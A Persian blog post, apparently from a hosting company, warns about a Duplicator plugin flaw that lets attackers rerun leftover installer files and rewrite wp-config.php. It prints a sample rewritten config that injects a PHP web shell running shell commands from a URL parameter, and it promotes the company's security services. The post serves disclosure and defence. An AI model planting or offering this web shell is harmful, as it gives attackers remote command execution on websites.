طی ۲ ماه گذشته وردپرس دوران خوبی را در حوزه امنیت نداشته است و مشکلات امنیتی سطح بالا و حیاتی در هسته وردپرس بوده است که از این طریق به هکر امکان اجرای کدها و دستورات مخرب بر علیه سایت های وردپرسی فراهم می کند که برای مطالعه کامل این موضوع این لینک را مشاهده نمایید.
این ماه نیز خبرهای خوبی از وردپرس به گوش نمیرسد . متاسفانه اسیب پذیری اخیرا در Duplicator ورد پرسی باعث شده است که امکان دسترسی اجرای کد از راه دور به هکر را میدهد و هکر در این حالت یکی از شایع ترین اقداماتی که هکر میکند تزریق کد های مخرب به فایل wp-config.php می باشد و یا یکی از اقدامات دیگر حدف فایل wp-config.php بوده است . که با این کار صفحه نصب وردپرس نمایش داده می شود و یا وب سایت با صفحه سفید نمایش داده می شود. آسیب پذیری ذکر شده در نسخه ۱.۲.۴۲ و نسخه های پایین تر وجود دارد.
پلاگین duplicator که تاکنون بیش از ۱۰ میلیون نصب داشته است و جز پلاگین های پرکاربرد می باشد و عمدتا وب مستران برای کپی کردن یک وب سایت به وب سایت دیگر استفاده می شود که این تعداد نصب نشان از اهمیت این مشکل امنیتی برای وب مستران می باشد و باید هرچه زود تر نسبت به بروز رسانی پلاگین مربوطه اقدام کنند.
آسیب پذیری در این پلاگین در سال ۲۰۱۷ نیز منتشر شده بود ولی چرا با گذشت بیش از یکسال بار دیگر نیز این مشکل رخ داده است .
پاسخ سوال در وجود فایل installer.php قدیمی در روت وب سایت شما می باشد که براساس وجود آسیب پذیری در نسخه های قبل بوده است که برای درک این موضوع تحلیل فنی ذیل را مطالعه نمایید.
تحلیل فنی :
همانطوری که میدانید پلاگین duplicator از تمامی فایل ها ء پلاگین ها و قالب های وب سایت و بانک های اطلاعاتی وب سایت شما کپی تهیه کرده و در قالب یک فایل zip پکیج نصبیرا برای انتقال به وب سایت دیگر و یا انتقال به سرور دیگر در اختیار شما قرار میدهد.
پکیح مربوطه دارای یک فایل به نام installer.php می باشد و همچنین یک فایل به نام database.sql دارد که حاوی بانک اطلاعاتی وب سایت شما می باشد.
و زمانی که شما می خواهید از پلاگین مربوطه به جهت کپی گرفتن از وب سایت استفاده نمایید فایل های ذیل در روت اصلی وب سایت شما ذخیره می گردد.
database.php
installer.php
installer-backup.php
installer-data.sql
installer-log.txt
که مشکل امنیتی دقیقا در همین فایل ها وجود دارد که به هکر اجازه میدهد دوباره بسته نصبی را اجرا کند و تنظیمات وب سایت شما را ریست کنند و با ارسال درخواست های مخرب فایل wp-config.php شما را بازنویسی مجدد با محتویات مخرب نمایند.برای حل این مشکل پس از بروز رسانی پلاگین مربوطه بلافاصله فایل های ذکر شده را حذف نمایید. حذف فایل های مربوطه جز مهم ترین بخش پوشش این آسیب پذیری می باشد و بلافاصله باید فایل ها را حذف نمایید.
در ذیل فایل wp-config.php را خواهید دید که با کد های مخرب بازنویسی شده است.
[php]
// ** MySQL settings – You can get this info from your web host ** //
/** The name of the database for WordPress */
define(‘DB_NAME’, ‘test
‘); file_put_contents("test.php", ‘<pre><?php if
(isset($_GET["synacktiv_backdoor"])) { echo shell_exec($_GET["synacktiv_backdoor"]); } ?></pre>’);
/
*
‘);
/** MySQL database username */
define(‘DB_USER’, ‘test’);
/** MySQL database password */
define(‘DB_PASSWORD’, ‘test’);
/** MySQL hostname */
define(‘DB_HOST’, ‘nowhere:12345’);
/** Database Charset to use in creating database tables. */
define(‘DB_CHARSET’, ‘utf8’);
/** The Database Collate type. Don’t change this if in doubt. */
define(‘DB_COLLATE’, ”);
[/php]
این یکی از فایل هایی که هکر بازنویسی کرده است را مشاهده نمودید ولی متاسفانه هکر اقدام به قراردادن backdoor (درب پشتی) برای دسترسی های بعدی می نماید که شما لازم است که فایل های مخرب را شناسایی و حذف نمایید و شناسایی این فایل ها کار بسیار دشواری می باشد .که می توانید این کار تخصصی رو به متخصصان امنیتی میهن هاستینگ بسپارید.
برای استفاده از خدمات تخصصی امنیتی ما می توانید یک تیکت به بخش امنیت میهن هاستینگ ارسال نمایید.
